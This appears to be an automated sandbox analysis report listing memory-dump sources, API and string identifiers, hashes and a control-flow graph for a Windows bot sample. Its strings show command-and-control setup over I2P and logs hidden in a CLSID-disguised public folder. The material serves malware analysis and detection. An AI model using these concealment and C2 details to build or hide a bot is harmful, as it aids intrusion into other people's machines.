                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$prgmgr.l$~
                                                                    • API String ID: 3395718042-2735303109
                                                                    • Opcode ID: 4c8c7b1f501ae0fbbe7ec8e07eea4ca15baf89deede0404f13feed1bd5c2cc26
                                                                    • Instruction ID: dda68b26fb108725435e81f55224c5053a319fa912c31e3720b6d616129f1e91
                                                                    • Opcode Fuzzy Hash: 4c8c7b1f501ae0fbbe7ec8e07eea4ca15baf89deede0404f13feed1bd5c2cc26
                                                                    • Instruction Fuzzy Hash: B6518D50E1E74386FB309F58A8803F82691AF05788F544032D9CE473BBEE2DA985CF41
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$dwlmgr.l$log$~
                                                                    • API String ID: 3395718042-2859552336
                                                                    • Opcode ID: 27ea5ecb8930a5d572a67ee6d818b6b1525ff907abdc708875468967654232a4
                                                                    • Instruction ID: a146227539785c2fe24afed5a1c5204a23cb0bbd3e01710ba213c2e68459c079
                                                                    • Opcode Fuzzy Hash: 27ea5ecb8930a5d572a67ee6d818b6b1525ff907abdc708875468967654232a4
                                                                    • Instruction Fuzzy Hash: A3517054E0C7C7F6FB249B89A8D43B81351AF46784F510072D98E063B2DF6FA9869743

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1207 7ffe0e16143c-7ffe0e161464 InitializeCriticalSectionAndSpinCount 1208 7ffe0e161590-7ffe0e1615b1 GetLastError call 7ffe0e161292 1207->1208 1209 7ffe0e16146a-7ffe0e16149e call 7ffe0e16cc60 call 7ffe0e168ff1 1207->1209 1214 7ffe0e1615b3 1208->1214 1215 7ffe0e1615d2-7ffe0e1615d8 1208->1215 1222 7ffe0e161569-7ffe0e161581 call 7ffe0e161292 1209->1222 1223 7ffe0e1614a4-7ffe0e1614bb strlen 1209->1223 1217 7ffe0e161691-7ffe0e161696 1214->1217 1218 7ffe0e1615b9-7ffe0e1615c6 1214->1218 1220 7ffe0e1615de-7ffe0e1615e4 1215->1220 1221 7ffe0e16169b 1215->1221 1217->1222 1218->1215 1224 7ffe0e161610-7ffe0e161613 1220->1224 1225 7ffe0e1615e6-7ffe0e1615ec 1220->1225 1228 7ffe0e1616a5-7ffe0e1616aa 1221->1228 1239 7ffe0e161586-7ffe0e16158f 1222->1239 1232 7ffe0e1614d3-7ffe0e1614d6 1223->1232 1233 7ffe0e1614bd-7ffe0e1614c0 1223->1233 1230 7ffe0e161615-7ffe0e161618 1224->1230 1231 7ffe0e16162d-7ffe0e161633 1224->1231 1226 7ffe0e1615f2-7ffe0e1615f8 1225->1226 1227 7ffe0e1616b9-7ffe0e1616be 1225->1227 1235 7ffe0e1616c3-7ffe0e1616c8 1226->1235 1236 7ffe0e1615fe-7ffe0e161604 1226->1236 1227->1222 1228->1222 1240 7ffe0e16161a-7ffe0e16161d 1230->1240 1241 7ffe0e161687 1230->1241 1242 7ffe0e161635-7ffe0e16163a 1231->1242 1243 7ffe0e1616af 1231->1243 1237 7ffe0e1614f8-7ffe0e161541 strlen fopen 1232->1237 1238 7ffe0e1614d8-7ffe0e1614f2 strcat strlen 1232->1238 1233->1232 1234 7ffe0e1614c2-7ffe0e1614cf strlen 1233->1234 1234->1232 1235->1222 1244 7ffe0e16163f-7ffe0e161644 1236->1244 1245 7ffe0e161606-7ffe0e16160b 1236->1245 1246 7ffe0e16165d-7ffe0e161678 call 7ffe0e161292 1237->1246 1247 7ffe0e161547-7ffe0e161563 call 7ffe0e161292 1237->1247 1238->1237 1240->1228 1248 7ffe0e161623-7ffe0e161628 1240->1248 1241->1217 1242->1222 1243->1227 1244->1222 1245->1222 1246->1222 1247->1222 1253 7ffe0e1616cd-7ffe0e1616e7 call 7ffe0e161292 1247->1253 1248->1222 1253->1239
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                                    • String ID: $C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log$Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$samctl.l$~
                                                                    • API String ID: 3395718042-1297835036
                                                                    • Opcode ID: 75ce88114f5ed3673b241250adb80a8e0a3a4f430a2aff4d0550542a4359febc
                                                                    • Instruction ID: 2b1b7227dc494e42412e9eb230d652b9badbfd2ec09cbc4242d57d9e97602156
                                                                    • Opcode Fuzzy Hash: 75ce88114f5ed3673b241250adb80a8e0a3a4f430a2aff4d0550542a4359febc
                                                                    • Instruction Fuzzy Hash: 6A517A90F0D717A5FB209B15B8803BC6365AF46B88F944433D9DE166B3DE6CB946C381
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: OpenQueryValuefflushfwrite
                                                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                    • API String ID: 1980715187-354652506
                                                                    • Opcode ID: 8ef715939b3187d01807caee3237308355422bb7c9e516a9105dacea84116d8a
                                                                    • Instruction ID: 9972f9d00a7cf9b7922f6fe7be4b19b4d1ab98aea6415764953720746d05c9c9
                                                                    • Opcode Fuzzy Hash: 8ef715939b3187d01807caee3237308355422bb7c9e516a9105dacea84116d8a
                                                                    • Instruction Fuzzy Hash: 9FA16E61D0CF0B81FB319B87A8403BD725EAF40764F8405BAD95E466B5EFADE985C302
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: OpenQueryValuefflushfwrite
                                                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                    • API String ID: 1980715187-354652506
                                                                    • Opcode ID: 91e22bc91e54bc58e856e97781ef2ffe84c4e6d35a4899b3a718a3367aff592f
                                                                    • Instruction ID: 3744ed14cb7a9b057d371dbbe0ab57edd8688f12908ec84d80c6af27f74464f2
                                                                    • Opcode Fuzzy Hash: 91e22bc91e54bc58e856e97781ef2ffe84c4e6d35a4899b3a718a3367aff592f
                                                                    • Instruction Fuzzy Hash: BCA1126090CF0B99FA349747EC0137D2A54AF20774F5401B2D93E2A7B6EEADA9859309
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: OpenQueryValuefflushfwrite
                                                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                    • API String ID: 1980715187-354652506
                                                                    • Opcode ID: 1abb7ebd222f50c9fc3d373f1674413f5d06b6c098932a38b08917e042cbaed5
                                                                    • Instruction ID: 2667aeca55bc9b5327690d97f469b3a4314182f243a021d48afd402c142183d7
                                                                    • Opcode Fuzzy Hash: 1abb7ebd222f50c9fc3d373f1674413f5d06b6c098932a38b08917e042cbaed5
                                                                    • Instruction Fuzzy Hash: 1BA14CA5E0C74B81FA709F44A8403B87354EF04744F940132EADE466B9EE6DEE85EF42
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: OpenQueryValuefflushfwrite
                                                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                    • API String ID: 1980715187-354652506
                                                                    • Opcode ID: 21a027e01d0a802bb0402d144294a9673ea0a9f2328124885c32d9706be0d8ac
                                                                    • Instruction ID: fbce9830c482c0859451cc1e8781d26d5f25121d2fd6d09f45708c3332e6329a
                                                                    • Opcode Fuzzy Hash: 21a027e01d0a802bb0402d144294a9673ea0a9f2328124885c32d9706be0d8ac
                                                                    • Instruction Fuzzy Hash: 4DA1276090C70B81FA389F04A8403FA2350AF1074AF541136DADE467B9FEAEF985DF46
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: OpenQueryValuefflushfwrite
                                                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                    • API String ID: 1980715187-354652506
                                                                    • Opcode ID: add2c6f352bf346838c4181cb8fcec24f82c3f84547b9df47f0d9f61b9981692
                                                                    • Instruction ID: c1bb9daeef389e582dc7a15a761058b666412f794126ca6ca53f4188ea715aac
                                                                    • Opcode Fuzzy Hash: add2c6f352bf346838c4181cb8fcec24f82c3f84547b9df47f0d9f61b9981692
                                                                    • Instruction Fuzzy Hash: DCA11F6091C7CBA1FA309B80A8C13B96254AFC6349F540132D9DE467B7EE7FA985D343
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd
                                                                    Similarity
                                                                    • API ID: OpenQueryValuefflushfwrite
                                                                    • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                    • API String ID: 1980715187-354652506
                                                                    • Opcode ID: 632aff3722bd8956f43628932af91c65379f9aea214a8283ff1c1a5fc9fdd48f
                                                                    • Instruction ID: e0be538e72c5d9ca48400dccdab6c26f61b90234eaf67667fe3a28693ca64aa8
                                                                    • Opcode Fuzzy Hash: 632aff3722bd8956f43628932af91c65379f9aea214a8283ff1c1a5fc9fdd48f
                                                                    • Instruction Fuzzy Hash: 6CA15E60E0C75B82FB349B00A944BB93260AF54788F540137DADE867B7EF6DE985C342
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: CreateErrorLastThread
                                                                    • String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
                                                                    • API String ID: 1689873465-2891999747
                                                                    • Opcode ID: 9aa31627ddd2c6ffe85cc1af262b3380d497ea8405b81abd2497743e5f52b55d
                                                                    • Instruction ID: a75eeebe7889d987e3d37cc514e3759e92a68fb5896b3aec63fe0fd1bc7c58d0
                                                                    • Opcode Fuzzy Hash: 9aa31627ddd2c6ffe85cc1af262b3380d497ea8405b81abd2497743e5f52b55d
                                                                    • Instruction Fuzzy Hash: EB916D21A0CF4399F7619B96A8843BD229EAB05378F5402B9D46D472F2DF7CE949C341
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$fclosefopenfwrite
                                                                    • String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                                                    • API String ID: 608220805-961576452
                                                                    • Opcode ID: 1cb5eafd62267dfe483e8b9f6ab85db23e0a2ddce2e864eb0c2ab42da6a02e53
                                                                    • Instruction ID: 5eeecb7f588019d38fbe27f31ceb0efd2ab35872d8ecae5937953d591e6df461
                                                                    • Opcode Fuzzy Hash: 1cb5eafd62267dfe483e8b9f6ab85db23e0a2ddce2e864eb0c2ab42da6a02e53
                                                                    • Instruction Fuzzy Hash: 15515C61A09643A1FA109BDDE9442B83311AF54799F580B32EB4DCBAF5DF3CF6468380
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                    • API String ID: 1104438493-906809513
                                                                    • Opcode ID: b9a3b54f26be01f7b6bfa2c8b55ba6896c38e4924eb50a070b0cda7e7dea3bad
                                                                    • Instruction ID: d398d32bb69e3b895d62c269aa6720503ebed9e1105f8ff3a227bfc9e9a0d080
                                                                    • Opcode Fuzzy Hash: b9a3b54f26be01f7b6bfa2c8b55ba6896c38e4924eb50a070b0cda7e7dea3bad
                                                                    • Instruction Fuzzy Hash: 4571AF62B2CE4381FB214B97E8887BD1249BF44768F5901BAD90F476B5EE7CE8458701
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                                    • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                    • API String ID: 1104438493-906809513
                                                                    • Opcode ID: 79b62836e56daeaee3d79f430ae09f58abf3677d551c19074f938b73c9acbfd6
                                                                    • Instruction ID: ff3d99c90e491bd565820330cc308f942ed908fc176f1e3385dc5dd42f54641d
                                                                    • Opcode Fuzzy Hash: 79b62836e56daeaee3d79f430ae09f58abf3677d551c19074f938b73c9acbfd6
                                                                    • Instruction Fuzzy Hash: B9716B61E0D68386FB319F18E8407F92291AF48758F150132D9EE477B9EE3CE9858F01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true
                                                                    • Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
